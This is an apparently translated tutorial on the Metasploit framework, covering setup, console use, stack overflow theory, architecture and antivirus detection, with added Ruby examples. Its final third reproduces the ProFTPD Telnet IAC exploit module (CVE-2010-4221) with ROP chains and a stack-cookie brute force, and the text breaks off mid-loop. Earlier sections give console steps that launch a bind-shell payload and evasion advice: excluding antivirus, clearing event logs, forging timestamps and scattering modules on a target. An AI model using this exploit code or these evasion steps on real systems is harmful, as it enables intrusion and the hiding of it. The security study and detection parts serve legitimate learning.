Metasploit Explained: A Detailed Illustrated Tutorial

Updated: 2024-10-05 05:22:38


1. Introduction to Metasploit

Metasploit is an open-source framework for finding and exploiting security vulnerabilities. Because it is free, security staff commonly use it to test the security of their own systems. The Metasploit Framework (MSF) was released as open source in 2003 and is a freely available development framework: a powerful open-source platform for developing, testing and using exploit code, and a reliable environment for penetration testing, shellcode writing and vulnerability research.

Its extensible model brings payloads, encoders, NOP generators and exploits together, which makes the Metasploit Framework a practical way to study high-risk vulnerabilities. It integrates common overflow exploits and popular shellcode for many platforms and is continually updated.



2. Setting up the Metasploit environment

The notes below apply to the Windows installer of the framework version documented on this page:

1) Turn off antivirus software during installation; otherwise it conflicts with Metasploit and the installation fails. In practice, add the Metasploit installation directory as an antivirus exclusion afterwards rather than leaving antivirus off: the exploit and payload files are flagged as soon as scanning is re-enabled.
2) In Control Panel, Regional and Language Options, select English (United States), and select English (United States) again on the Advanced tab. The installer checks the locale and fails in non-English locales.






3. Using Metasploit

Metasploit currently offers three user interfaces: a GUI, the console (msfconsole) and a command-line (msfcli) mode. A web interface used to exist but is no longer supported. Each mode has its advantages and drawbacks; the console is recommended, because almost all of the framework's functionality is available from it and external commands such as ping can also be run from it.

Launching the GUI on Windows: Start menu, Metasploit Framework, Metasploit GUI, as shown below:

Figure 1: launching the Metasploit GUI

Figure 2: the Metasploit GUI after start-up

Figure 3: the Metasploit console after start-up





A typical console session against a single exploit module (the figures use the MS04-045 WINS exploit):

1) show exploits                              list the available exploit modules (Figure 5)
2) info exploit/windows/wins/ms04_045_wins    show the module's description (Figure 6)
3) use exploit/windows/wins/ms04_045_wins     select this exploit (Figure 7)
4) show options                               show the module's options (Figure 8)
5) set RHOST <target address>                 set the target host
6) set RPORT 7777                             set the target port
7) set PAYLOAD generic/shell_bind_tcp         set the payload (the shellcode to run after exploitation)
8) exploit                                    launch the attack

Where the module implements it, the check command tests whether the target looks vulnerable without launching the exploit; the return values of check are described in section 11.

Figure 5: show exploits

Figure 8: show options



4. Classes of attack used by Metasploit

A buffer overflow occurs when a program writes more data into a buffer than the buffer can hold, so that the excess overwrites adjacent legitimate data. Ideally a program would check the length of its input and refuse anything longer than the buffer, but most programs assume that the data will always fit the space allocated for it, and that assumption is what makes overflows possible. The buffers most often involved live on the stack: between function calls the stack holds local variables, saved registers and return addresses, and a stack buffer can overflow like any other.

Simply stuffing arbitrary data into a buffer until it overflows usually produces nothing more than a segmentation fault, which achieves nothing for the attacker. The usual technique is to craft the overflow so that the program spawns a shell and then to run further commands through that shell. If the program is owned by root and has the setuid bit set, the attacker obtains a root shell and can do anything on the system.

Two things are needed:

1) Place suitable code in the program's address space.
2) Initialise registers and memory so that the program jumps to the address the intruder chose and executes it.

Every function call leaves an activation record (stack frame) on the stack, and that record contains the address to return to when the function ends. By overflowing an automatic (stack-allocated) variable, the attacker overwrites the return address so that it points at the attack code; when the function returns, execution continues at the attacker's address instead of the original one. This is the stack smashing attack, still the most common form of buffer overflow attack.

A function pointer can point anywhere in the address space. For example, "void (*foo)()" declares a function pointer variable foo returning void. An attacker therefore only needs an overflowable buffer located near a function pointer, anywhere in memory: overflowing it changes the pointer, and the next time the program calls through that pointer, control flows where the attacker wants. A classic example of this was the superprobe program on Linux.

On current systems, stack canaries (SSP), non-executable stacks (NX) and address-space layout randomisation each break one step of this recipe; the ProFTPD module in section 11 shows what it costs to get past a canary.






5. Metasploit architecture

The Metasploit Framework is more than a collection of exploits: it lets you concentrate on writing your own exploit modules or extending the framework. A small part is implemented in assembly and C; the rest is Ruby. The overall architecture is shown in Figure 9.

Figure 9: overall Metasploit architecture

TOOLS: assorted utilities, mostly third-party software bundled with the framework
PLUGINS: plugins, mostly wrapping third-party software and calling its API directly; they only work in console mode
MODULES: the framework's modules
MSF core: the Metasploit Framework core, which provides the basic API, defines the framework and ties the subsystems together; loosely organised, and changing it is not recommended
MSF Base: extended, easier-to-use APIs layered on the core; may be changed
Rex LIBRARIES: the libraries contained in the framework (Rex, the Ruby Extension library): collections of classes, methods and modules
CLI: the command-line interface
GUI: the graphical user interface
Console: the console interface
Web: the web interface, no longer supported
Exploits: the exploit modules; an exploit module without a payload is effectively an auxiliary module
Payload: code that can be run dynamically on the remote host
Nops: generators for the no-operation instructions used to pad buffers
Aux: auxiliary modules that support an attack, such as port scanners
Encoders: re-encode payloads, for example to remove bad characters and to hinder signature detection

The /postgresql/lib/plugins directory contains mainly debugging and analysis plugins for PostgreSQL; there are other plugins as well, such as Ruby plugins.

The MSF core defines the overall architecture of the framework and provides its basic API; normally it is not called directly. Like the rest of the framework it is written in Ruby (lib/msf/core); the assembly and C code in the source tree, counted here as 136 assembly files, 7 .h files and 681 .c files, belongs to Meterpreter and the bundled external tools described next. The core is loosely organised and changing it is not recommended.

The C code does quite a lot: mainly the Meterpreter implementation and a number of tool-type applications, including Ruby bindings, memory-related code (such as memdump.c from the memdump package, used to dump or copy up to 4 GB of address space on DOS and Windows 9x), network-related code (pcaprub.c, part of the libpcap binding for Ruby) and anti-forensics code (timestomp.c from the timestomp tool, which modifies file timestamps). Most of these tools come straight from other software packages.

Meterpreter is the most important piece of this native code. It is a multi-purpose dynamic payload that can be extended at run time and provides the basis of the interactive shell. It runs entirely in memory inside the exploited process without creating a new process, and it encrypts its communications, which makes it hard to detect.

MSF Base is spread over many directories and defines a large number of practical APIs: SVN, scanning, encoding, update, operation, database, exploit, GUI, Java, Meterpreter, PHP, SNMP, module, Ruby and network APIs, among others. They are mainly called by the programs under modules, but developers may call them directly as well.


6. Developing your own Metasploit modules













7. Common detection methods used by security software

1) Timestamps of when events occurred (time)
2) When a suspicious file is found, looking for other files with similar MAC times, that is Modified, Accessed and Created timestamps, not network addresses (location)
3) File extension and file signature (file characteristics)
4) Checksums such as MD5 of the files on the system (content). Any hash detects changes, but MD5 collisions are cheap to produce, so current integrity baselines use SHA-256.
5) Searching for particular keywords (keyword)
6) Analysing file contents, called behaviour analysis on this page although what is described is signature matching: the security software knows a large number of virus instruction sequences in advance, scans file contents and raises an alert when a matching sequence is found (behaviour analysis)
7) Checking the current processes, ports, file system and so on (state check)
8) Scanning files as they are written to disk (on-access scanning)

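Methods 1 and 4 above (timestamps and content checksums) can be combined into one small integrity check. The following is an added example, not code from the original article or from Metasploit: it baselines a directory with SHA-256 (chosen over the page's MD5 because MD5 collisions are practical), reports added, removed and changed files, and flags files whose modification time is much older than their ctime, which is what a utime()-based timestamp forger such as timestomp leaves behind. The directory contents are constructed inside the example.

```ruby
require 'digest'
require 'tmpdir'

# Record every regular file under +root+: content hash plus the timestamps
# an investigator compares. ctime cannot be set from user space with utime(),
# which is what makes it useful below.
def build_baseline(root)
  baseline = {}
  Dir.glob(File.join(root, '**', '*'), File::FNM_DOTMATCH).each do |path|
    next unless File.file?(path)
    st = File.stat(path)
    baseline[path] = {
      sha256: Digest::SHA256.file(path).hexdigest,
      size:   st.size,
      mtime:  st.mtime,
      ctime:  st.ctime
    }
  end
  baseline
end

# Content check: what appeared, disappeared or changed since the baseline.
def diff_baselines(before, after)
  common = before.keys & after.keys
  {
    added:   after.keys - before.keys,
    removed: before.keys - after.keys,
    changed: common.select { |p| before[p][:sha256] != after[p][:sha256] }
  }
end

# Timestamp check: timestomp-style tools rewrite mtime/atime with utime(),
# and the kernel answers by setting ctime to "now". A file whose mtime is
# more than +skew+ seconds older than its ctime was touched after the time it
# claims to have been modified. Copies, chmod and package upgrades do this
# too, so treat hits as leads, not verdicts.
def suspicious_timestamps(baseline, skew = 60)
  baseline.select { |_, meta| meta[:ctime] - meta[:mtime] > skew }.keys
end

# Constructed scenario: baseline a directory, then simulate an intrusion that
# edits a config file, drops a new file and backdates the new file.
def demo
  Dir.mktmpdir('baseline') do |dir|
    conf = File.join(dir, 'service.conf')
    File.write(conf, "listen=127.0.0.1\n")
    before = build_baseline(dir)

    dropped = File.join(dir, 'helper.so')
    File.write(dropped, "constructed sample, not a real shared object\n")
    File.write(conf, "listen=0.0.0.0\n")
    a_year_ago = Time.now - 365 * 86_400
    File.utime(a_year_ago, a_year_ago, dropped)   # what timestomp would do

    after = build_baseline(dir)
    delta = diff_baselines(before, after)
    {
      changed: delta[:changed].map { |p| File.basename(p) },
      added:   delta[:added].map   { |p| File.basename(p) },
      removed: delta[:removed],
      stomped: suspicious_timestamps(after).map { |p| File.basename(p) }
    }
  end
end

puts demo.inspect if __FILE__ == $PROGRAM_NAME
```

The baseline itself has to be stored somewhere the attacker cannot rewrite (read-only media, another host), otherwise method 4 is defeated by simply re-hashing after the change.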

8. Metasploit's anti-detection techniques

1) Metasploit provides Meterpreter, which exposes a set of practical APIs. Meterpreter runs entirely in memory and creates no new process, encrypts its communications and can remove evidence of the intrusion effectively; the whole process takes about a second. This avoids detection by security software that watches for new processes.

2) 27 encoder modules are built in (in the version documented here; current releases have more) that can encode the payload of an exploit to avoid antivirus detection. In practice the encoders exist mainly to remove bad characters from a payload; antivirus products carry signatures for the decoder stubs, so encoding alone does not evade them. The 27 encoders are:

Name                      Rank       Description
----                      ----       -----------
cmd/generic_sh            good       Generic Shell Variable Substitution Command Encoder
cmd/ifs                   low        Generic ${IFS} Substitution Command Encoder
cmd/printf_php_mq         good       printf(1) via PHP magic_quotes Utility Command Encoder
generic/none              normal     The "none" Encoder
mipsbe/longxor            normal     XOR Encoder
mipsle/longxor            normal     XOR Encoder
php/base64                great      PHP Base64 encoder
ppc/longxor               normal     PPC LongXOR Encoder
ppc/longxor_tag           normal     PPC LongXOR Encoder
sparc/longxor_tag         normal     SPARC DWORD XOR Encoder
x64/xor                   normal     XOR Encoder
x86/alpha_mixed           low        Alpha2 Alphanumeric Mixedcase Encoder
x86/alpha_upper           low        Alpha2 Alphanumeric Uppercase Encoder
x86/avoid_utf8_tolower    manual     Avoid UTF8/tolower
x86/call4_dword_xor       normal     Call+4 Dword XOR Encoder
x86/context_cpuid         manual     CPUID-based Context Keyed Payload Encoder
x86/context_stat          manual     stat(2)-based Context Keyed Payload Encoder
x86/context_time          manual     time(2)-based Context Keyed Payload Encoder
x86/countdown             normal     Single-byte XOR Countdown Encoder
x86/fnstenv_mov           normal     Variable-length Fnstenv/mov Dword XOR Encoder
x86/jmp_call_additive     normal     Jump/Call XOR Additive Feedback Encoder
x86/nonalpha              low        Non-Alpha Encoder
x86/nonupper              low        Non-Upper Encoder
x86/shikata_ga_nai        excellent  Polymorphic XOR Additive Feedback Encoder
x86/single_static_bit     manual     Single Static Bit
x86/unicode_mixed         manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
x86/unicode_upper         manual     Alpha2 Alphanumeric Unicode Uppercase Encoder

3) A built-in log-clearing facility (Meterpreter's clearev command clears the Windows event logs) deletes the relevant logs to avoid detection.

4) The framework bundles timestomp (modifies file timestamps), slacker (hides files in slack space), SAM Juicer (part of Meterpreter, dumps password hashes from the SAM) and tools that forge MAC times (Modified, Accessed and Created timestamps) for removing evidence of an intrusion.

5) Avoid names or keywords that obviously suggest a Trojan or virus, such as "灰鸽子" (Gray Pigeon); these are certain to attract the attention of security software.

6) Store the modules you develop in several locations on the target machine, so that security software cannot remove all of them at once.

7) Attacking the security software itself to disable it; not yet developed.

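To make concrete what an encoder such as x86/countdown or x86/xor actually does to a payload, the following added example (my own code, not from the article or from Metasploit) implements the transform half of a single-byte XOR encoder: it searches for a key under which neither the key nor any encoded byte is a bad character, and shows the decode that a decoder stub performs at run time. The payload bytes and the bad-character set are constructed for the example. What the example omits is the other half of a real encoder, the machine-code decoder stub prepended to the payload, and that stub is exactly what antivirus signatures match on.

```ruby
# Bytes the hypothetical target cannot accept (NUL, LF, CR): constructed.
BADCHARS = "\x00\x0a\x0d".b

# Constructed stand-in for shellcode. It deliberately contains 0x00, 0x0a and
# 0x0d, so sending it raw would get it truncated or mangled. Not real code.
SAMPLE = "\x31\xc0\x50\x68\x00\x0a\x2f\x73\x68\x0d\xcd\x80".b

# Single-byte XOR encoder: pick the first key such that neither the key nor
# any encoded byte is a bad character. Returns [key, encoded], or nil when the
# bad-character set leaves no usable key, which is the failure msfencode
# reports when every encoder fails on a buffer.
def xor_encode(payload, badchars)
  bad = badchars.bytes
  (1..255).each do |key|
    next if bad.include?(key)            # the key itself sits in the decoder stub
    encoded = payload.bytes.map { |b| b ^ key }.pack('C*')
    return [key, encoded] if (encoded.bytes & bad).empty?
  end
  nil
end

# What the decoder stub does at run time, written in Ruby.
def xor_decode(key, encoded)
  encoded.bytes.map { |b| b ^ key }.pack('C*')
end

# Which bad bytes occur in +data+ (in order of first appearance).
def bad_bytes(data, badchars)
  data.bytes & badchars.bytes
end

def encode_roundtrip(payload = SAMPLE, badchars = BADCHARS)
  key, encoded = xor_encode(payload, badchars)
  return nil unless key
  {
    key:          key,
    before:       bad_bytes(payload, badchars),   # bad bytes in the raw payload
    after:        bad_bytes(encoded, badchars),   # bad bytes after encoding
    roundtrip_ok: xor_decode(key, encoded) == payload
  }
end

puts encode_roundtrip.inspect if __FILE__ == $PROGRAM_NAME
```

Note that the encoded bytes differ from the original but the decoder stub and the key do not change between runs; polymorphic encoders such as shikata_ga_nai vary the stub as well, which is why they rank higher in the list above.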

9. The general course of an attack

1) Obtain control of EIP. IP is the instruction pointer register: it holds the address of the next instruction to execute, which is how the CPU knows what to execute next. EIP is the 32-bit instruction pointer; the value it holds is an offset from the code segment base, which in flat 32-bit protected mode is effectively the linear address. ESP holds the current thread's stack pointer (top of the stack) and EBP the frame base pointer of the current function.

4) Add a user, or whatever else is wanted.

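Step 1 above, and the stack smashing attack described in section 4, can be walked through without a real target. The following is an added example (my own code, not from the article or from Metasploit): a toy stack frame with a 64-byte buffer, a saved EBP and a return address, an unchecked copy into it, the cyclic pattern scheme of Metasploit's pattern_create.rb and pattern_offset.rb used to recover the distance to the return address from the value that lands in EIP, and finally the buffer that redirects the return. The addresses are placeholders; on a real target, canaries, NX and ASLR each add a step that this toy omits.

```ruby
UPPER = ('A'..'Z').to_a
LOWER = ('a'..'z').to_a
DIGIT = ('0'..'9').to_a

# Cyclic pattern "Aa0Aa1Aa2..." in which every 4-byte window is unique,
# the same scheme as Metasploit's pattern_create.rb.
def pattern_create(length)
  out = +''
  UPPER.each do |u|
    LOWER.each do |l|
      DIGIT.each do |d|
        out << u << l << d
        return out[0, length] if out.length >= length
      end
    end
  end
  out[0, length]   # only reached for lengths beyond 20280 bytes
end

# Given the 32-bit value a debugger showed in EIP after the crash, return
# the offset of that value inside the pattern (what pattern_offset.rb does).
def pattern_offset(length, eip_value)
  pattern_create(length).b.index([eip_value].pack('V'))
end

# Toy stack frame of a function with a 64-byte local buffer, laid out the way
# the x86 prologue leaves it: [buffer][saved EBP][return address].
class ToyFrame
  BUF_SIZE = 64

  def initialize(return_address)
    @memory = ("\x00" * BUF_SIZE + [0xbffff000].pack('V') + [return_address].pack('V')).b
  end

  # strcpy-style copy with no bounds check: anything longer than the buffer
  # runs over the saved EBP and then the return address.
  def unsafe_copy(input)
    @memory[0, input.bytesize] = input.b
  end

  # What the CPU will load into EIP when the function returns.
  def saved_eip
    @memory[BUF_SIZE + 4, 4].unpack1('V')
  end
end

# Step 1 of the attack: find how many bytes lie between the start of the
# buffer and the return address. Crash with a pattern, read EIP, look it up.
def find_eip_offset(probe_len = 200)
  frame = ToyFrame.new(0x0804abcd)
  frame.unsafe_copy(pattern_create(probe_len))
  pattern_offset(probe_len, frame.saved_eip)    # 64 + 4 = 68 for ToyFrame
end

# Step 2: padding up to the return address, the address we want executed,
# then the code (here a marker, not shellcode). This is the shape the modules
# in section 11 build with rand_text(offset) + [ret].pack('V') + payload.
def build_overflow(offset, new_eip, code)
  ('A' * offset).b + [new_eip].pack('V') + code.b
end

def demo
  offset = find_eip_offset
  frame = ToyFrame.new(0x0804abcd)
  frame.unsafe_copy(build_overflow(offset, 0xdeadbeef, "\xcc" * 8))
  frame.saved_eip   # the function would now "return" to 0xdeadbeef
end

printf("offset=%d eip=0x%08x\n", find_eip_offset, demo) if __FILE__ == $PROGRAM_NAME
```

The pack('V') calls are the little-endian detail that trips people up: the value 0xdeadbeef has to be written as the bytes ef be ad de for the CPU to read it back as 0xdeadbeef.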

10. Malware classification

1) Trojan horse: instructions hidden inside otherwise useful software that carry out malicious actions. Malicious instructions built in when the program is written are usually called a Trojan horse; malicious code added after the program was written is called a virus.
2) Virus: instructions that, once executed, implant themselves into other programs. A virus installs itself by replacing an instruction: for example, the instruction at X is replaced by a jump to some other location Y in memory, the virus code runs at Y, then the displaced original instruction is executed and control jumps back to X+1.
3) Worm: a program that replicates itself and installs itself on other computers over the network.
4) Trapdoor: an undocumented entry point deliberately left in a program, often for debugging, which can also be used as a security hole.
5) Logic bomb: malicious instructions triggered later under a specific condition, for example at a particular time.
6) Zombie: malicious code installed on other computers that can be controlled remotely to carry out attacks; because the attack comes from another host it is harder to trace. Attackers often install large numbers of zombies to generate large volumes of network traffic.
11. Exploits in detail: proftp_telnet_iac.rb

A module's check method returns one of these values:

CheckCode::Safe           the target is not vulnerable; the exploit will probably fail
CheckCode::Detected       the target runs the relevant service, but vulnerability could not be confirmed
CheckCode::Appears        the target appears to be vulnerable (for example by version), but this was not verified
CheckCode::Vulnerable     the target was confirmed vulnerable
CheckCode::Unsupported    this exploit does not support checking the target

The module source follows, with the page's annotations translated into comments:




##
# $Id: proftp_telnet_iac.rb 11208 2010-12-02 21:10:03Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  #include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)',
      'Description'    => %q{
          This module exploits a stack-based buffer overflow in versions of ProFTPD
        server between versions 1.3.2rc3 and 1.3.3b. By sending data containing a
        large number of Telnet IAC commands, an attacker can corrupt memory and
        execute arbitrary code.

        The Debian Squeeze version of the exploit uses a little ROP stub to indirectly
        transfer the flow of execution to a pool buffer (the cmd_rec "res" in

        The Ubuntu version uses a full-blown ROP to mmap RWX memory, copy a small stub
        to it, and execute the stub. The stub then copies the remainder of the payload
        in and executes it.

        NOTE: Most Linux distributions either do not ship a vulnerable version of
        ProFTPD, or they ship a version compiled with stack smashing protection.

        Although SSP significantly reduces the probability of a single attempt
        succeeding, it will not prevent exploitation. Since the daemon forks in a
        default configuration, the cookie value will remain the same despite
        some attempts failing. By making repeated requests, an attacker can eventually
        guess the cookie value and exploit the vulnerability.

        The cookie in Ubuntu has 24-bits of entropy. This reduces the effectiveness
        and could allow exploitation in semi-reasonable amount of time.
      },
      'Author'         => [ 'jduck' ],
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision: 11208 $',
      'References'     =>
        [
          ['CVE', '2010-4221'],
          ['OSVDB', '68985'],
          ['BID', '44562']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'PrependChrootBreak' => true
        },
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 4096,    # maximum payload size
          # NOTE: \xff are avoided here so we can control the number of them being sent.
          'BadChars' => "\x09\x0a\x0b\x0c\x0d\x20\xff",
          'DisableNops'    => 'True',
        },
      'Platform'       => [ 'linux', ],
      'Targets'        =>
        [
          #
          # Automatic targeting via fingerprinting
          #
          [ 'Automatic Targeting', { 'auto' => true } ],

          #
          # This special one comes first since we dont want its index changing.
          #
          [ 'Debug',
            {
              'IACCount' => 8192, # should cause crash writing off end of stack
              'Offset' => 0,
              'Ret' => 0x41414242,
              'Writable' => 0x43434545
            }
          ],

          #
          # specific targets
          #

          # NOTE: this minimal rop works most of the time, but it can fail
          # if the proftpd pool memory is in a different order for whatever reason...
          [ 'ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1',
            {
              'IACCount' => 4096+16,
              'Offset' => 0x102c-4,
              # NOTE: All addresses are from the proftpd binary
              'Ret' => 0x805a547, # pop esi / pop ebp / ret
              'Writable' => 0x80e81a0, # .data
              'RopStack' =>
                [
                  # Writable is here
                  0xcccccccc, # unused
                  0x805a544, # mov eax,esi / pop ebx / pop esi / pop ebp / ret
                  0xcccccccc, # becomes ebx
                  0xcccccccc, # becomes esi
                  0xcccccccc, # becomes ebp
                  # quadruple deref the res pointer :)
                  0x8068886, # mov eax,[eax] / ret
                  0x8068886, # mov eax,[eax] / ret
                  0x8068886, # mov eax,[eax] / ret
                  0x8068886, # mov eax,[eax] / ret
                  # skip the pool chunk header
                  0x805bd8e, # inc eax / adc cl, cl / ret
                  0x805bd8e, # inc eax / adc cl, cl / ret
                  0x805bd8e, # inc eax / adc cl, cl / ret
                  0x805bd8e, # inc eax / adc cl, cl / ret
                  0x805bd8e, # inc eax / adc cl, cl / ret
                  0x805bd8e, # inc eax / adc cl, cl / ret
                  0x805bd8e, # inc eax / adc cl, cl / ret
                  0x805bd8e, # inc eax / adc cl, cl / ret
                  0x805bd8e, # inc eax / adc cl, cl / ret
                  0x805bd8e, # inc eax / adc cl, cl / ret
                  0x805bd8e, # inc eax / adc cl, cl / ret
                  0x805bd8e, # inc eax / adc cl, cl / ret
                  0x805bd8e, # inc eax / adc cl, cl / ret
                  0x805bd8e, # inc eax / adc cl, cl / ret
                  0x805bd8e, # inc eax / adc cl, cl / ret
                  0x805bd8e, # inc eax / adc cl, cl / ret
                  # execute the data :)
                  0x0805c26c, # jmp eax
                ]
            }
          ],

          # For the version compiled with symbols :)
          [ 'ProFTPD 1_3_3a Server (Debian) - Squeeze Beta1 (Debug)',
            {
              'IACCount' => 4096+16,
              'Offset' => 0x1028-4,
              # NOTE: All addresses are from the proftpd binary
              'Writable' => 0x80ec570, # .data
              'Ret' => 0x80d78c2, # pop esi / pop ebp / ret
              'RopStack' =>
                [
                  # Writable is here
                  #0x0808162a, # jmp esp (works w/esp fixup)
                  0xcccccccc, # unused becomes ebp
                  0x80d78c2, # mov eax,esi / pop esi / pop ebp / ret
                  0xcccccccc, # unused becomes esi
                  0xcccccccc, # unused becomes ebp
                  # quadruple deref the res pointer :)
                  0x806a915, # mov eax,[eax] / pop ebp / ret
                  0xcccccccc, # unused becomes ebp
                  0x806a915, # mov eax,[eax] / pop ebp / ret
                  0xcccccccc, # unused becomes ebp
                  0x806a915, # mov eax,[eax] / pop ebp / ret
                  0xcccccccc, # unused becomes ebp
                  0x806a915, # mov eax,[eax] / pop ebp / ret
                  0xcccccccc, # unused becomes ebp
                  # skip the pool chunk header
                  0x805d6a9, # inc eax / adc cl, cl / ret
                  0x805d6a9, # inc eax / adc cl, cl / ret
                  0x805d6a9, # inc eax / adc cl, cl / ret
                  0x805d6a9, # inc eax / adc cl, cl / ret
                  0x805d6a9, # inc eax / adc cl, cl / ret
                  0x805d6a9, # inc eax / adc cl, cl / ret
                  0x805d6a9, # inc eax / adc cl, cl / ret
                  0x805d6a9, # inc eax / adc cl, cl / ret
                  0x805d6a9, # inc eax / adc cl, cl / ret
                  0x805d6a9, # inc eax / adc cl, cl / ret
                  0x805d6a9, # inc eax / adc cl, cl / ret
                  0x805d6a9, # inc eax / adc cl, cl / ret
                  0x805d6a9, # inc eax / adc cl, cl / ret
                  0x805d6a9, # inc eax / adc cl, cl / ret
                  0x805d6a9, # inc eax / adc cl, cl / ret
                  0x805d6a9, # inc eax / adc cl, cl / ret
                  # execute the data :)
                  0x08058de6, # jmp eax
                ]
            }
          ],

          [ 'ProFTPD 1.3.2c Server (Ubuntu 10.04)',
            {
              'IACCount' => 1018,
              'Offset' => 0x420,
              'CookieOffset' => -0x20,
              'Writable' => 0x80db3a0, # becomes esi (beginning of .data)
              'Ret' => 0x805389b, # pop esi / pop ebp / ret
              'RopStack' =>
                [
                  0xcccccccc, # becomes ebp

                  0x8080f04, # pop eax / ret
                  0x80db330, # becomes eax (GOT of mmap64)

                  0x806a716, # mov eax, [eax] / ret
                  0x805dd5c, # jmp eax
                  0x80607b2, # add esp, 0x24 / pop ebx / pop ebp / ret
                  # mmap args
                  0, 0x20000, 0x7, 0x22, 0xffffffff, 0,
                  0, # unused
                  0xcccccccc, # unused
                  0xcccccccc, # unused
                  0x100000000 - 0x5d5b24c4 + 0x80db3a4, # becomes ebx
                  0xcccccccc, # becomes ebp

                  # note, ebx gets fixed above :)
                  # 0xfe in 'ah' doesn't matter since we have more than enough space.
                  # now, load an instruction to store to eax
                  0x808b542, # pop edx / mov ah, 0xfe / inc dword ptr [ebx+0x5d5b24c4] / ret
                  # becomes edx - mov [eax+ebp*4], ebx / ret
                  # (value reconstructed here from that comment: bytes 89 1c a8 c3 little-endian)
                  0xc3a81c89,

                  # store it :)
                  0x805c2d0, # mov [eax], edx / add esp, 0x10 / pop ebx / pop esi / pop ebp / ret
                  0xcccccccc, # unused
                  0xcccccccc, # unused
                  0xcccccccc, # unused
                  0xcccccccc, # unused
                  0xcccccccc, # becomes ebx
                  0xcccccccc, # becomes esi
                  0xcccccccc, # becomes ebp

                  # Copy the following stub:
                  #"\x8d\xb4\x24\x21\xfb\xff\xff" # lea esi, [esp-0x4df]
                  #"\x8d\x78\x12" # lea edi, [eax+0x12]
                  #"\x6a\x7f" # push 0x7f
                  #"\x59"     # pop ecx
                  #"\xf2\xa5" # rep movsd

                  0x80607b5, # pop ebx / pop ebp / ret
                  0xfb2124b4, # becomes ebx
                  1, # becomes ebp
                  0x805dd5c, # jmp eax

                  0x80607b5, # pop ebx / pop ebp / ret
                  0x788dffff, # becomes ebx
                  2, # becomes ebp
                  0x805dd5c, # jmp eax

                  0x80607b5, # pop ebx / pop ebp / ret
                  0x597f6a12, # becomes ebx
                  3, # becomes ebp
                  0x805dd5c, # jmp eax

                  0x80607b5, # pop ebx / pop ebp / ret
                  0x9090a5f2, # becomes ebx
                  4, # becomes ebp
                  0x805dd5c, # jmp eax

                  0x80607b5, # pop ebx / pop ebp / ret
                  0x8d909090, # becomes ebx
                  0, # becomes ebp
                  0x805dd5c, # jmp eax

                  # hopefully we dont get here
                ]
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Nov 1 2010'))

    # FTP listens on 21 by default; the Tcp mixin registers RPORT without a default
    register_options(
      [
        Opt::RPORT(21)
      ], self.class )
  end

  # The check method: probe the target without firing the exploit
  def check
    # NOTE: We don't care if the login failed here...
    ret = connect            # connect to the target (connect comes from the Tcp mixin)
    banner = sock.get_once   # read the FTP banner

    # We just want the banner to check against our targets..
    print_status("FTP Banner: #{banner.strip}")    # report the banner

    status = CheckCode::Safe                      # assume safe until a vulnerable version is recognised
    if banner =~ /ProFTPD (1\.3\.[23][^ ])/i       # does the banner match the affected product?
      ver = $1
      maj,min,rel = ver.split('.')
      relv = rel.slice!(0,1)
      case relv
      when '2'
        if rel.length > 0
          if rel[0,2] == 'rc'
            if rel[2,rel.length].to_i >= 3
              status = CheckCode::Vulnerable
            end
          else
            status = CheckCode::Vulnerable
          end
        end
      when '3'
        # 1.3.3+ defaults to vulnerable (until >= 1.3.3c)
        status = CheckCode::Vulnerable
        if rel.length > 0
          if rel[0,2] != 'rc' and rel[0,1] > 'b'
            status = CheckCode::Safe
          end
        end
      end
    end

    disconnect        # close the connection
    return status     # hand the result back to the framework
  end

  def exploit
    connect
    banner = sock.get_once

    # Use a copy of the target
    mytarget = target

    if (target['auto'])
      mytarget = nil

      print_status("Automatically detecting the target...")
      if (banner and (m = banner.match(/ProFTPD (1\.3\.[23][^ ]) Server/i))) then
        print_status("FTP Banner: #{banner.strip}")
        version = m[1]
      else
        raise RuntimeError, "No matching target"
      end

      regexp = Regexp.escape(version)
      self.targets.each do |t|
        if (t.name =~ /#{regexp}/) then
          mytarget = t
          break
        end
      end

      if (not mytarget)
        raise RuntimeError, "No matching target"
      end

      print_status("Selected Target: #{mytarget.name}")
    else
      print_status("Trying target #{mytarget.name}...")
      if banner
        print_status("FTP Banner: #{banner.strip}")
      end
    end

    #puts "attach and press any key"; bleh = $stdin.gets
    buf = ''
    buf << 'SITE '
    #buf << "\xcc"
    if mytarget['CookieOffset']
      buf << "\x8d\xa0\xfc\xdf\xff\xff" # lea esp, [eax-0x2004]
    end
    buf << payload.encoded

    # The number of characters left must be odd at this point.
    buf << rand_text(1) if (buf.length % 2) == 0
    buf << "\xff" * (mytarget['IACCount'] - payload.encoded.length)

    buf << rand_text_alphanumeric(mytarget['Offset'] - buf.length)
    # Order follows the gadget comments above: Ret overwrites the saved return
    # address, and its "pop esi" then loads Writable.
    addrs = [
      mytarget['Ret'],
      mytarget['Writable']
    ].pack('V*')

    if mytarget['RopStack']
      addrs << mytarget['RopStack'].map { |e|
        if e == 0xcccccccc
          # unused slots get random bytes instead of a recognisable constant
          rand_text(4).unpack('V').first
        else
          e
        end
      }.pack('V*')
    end

    # Make sure we didn't introduce instability
    addr_badchars = "\x09\x0a\x0b\x0c\x20"
    if idx = Rex::Text.badchar_index(addrs, addr_badchars)
      raise RuntimeError, ("One or more address contains a bad character! (0x%02x @ 0x%x)" % [addrs[idx,1].unpack('C').first, idx])
    end

    buf << addrs
    buf << "\r\n"

    # In the case of Ubuntu, the cookie has 24-bits of entropy. Further more, it
    # doesn't change while proftpd forks children. Therefore, we can try forever
    # and eventually guess it correctly.
    #
    # NOTE: if the cookie contains one of our bad characters, we're SOL.
    #
    if mytarget['CookieOffset']
      print_status("!!! Attempting to bruteforce the cookie value! This can take days. !!!")

      disconnect
      max = 0xffffff00
      off = mytarget['Offset'] + mytarget['CookieOffset']
      cookie = last_cookie = 0
      #cookie = 0x17ccd600
      start = Time.now
      last = start - 10
      while not session_created?
        now = Time.now
        if (now - last) >= 10
          perc = (cookie * 100) / max
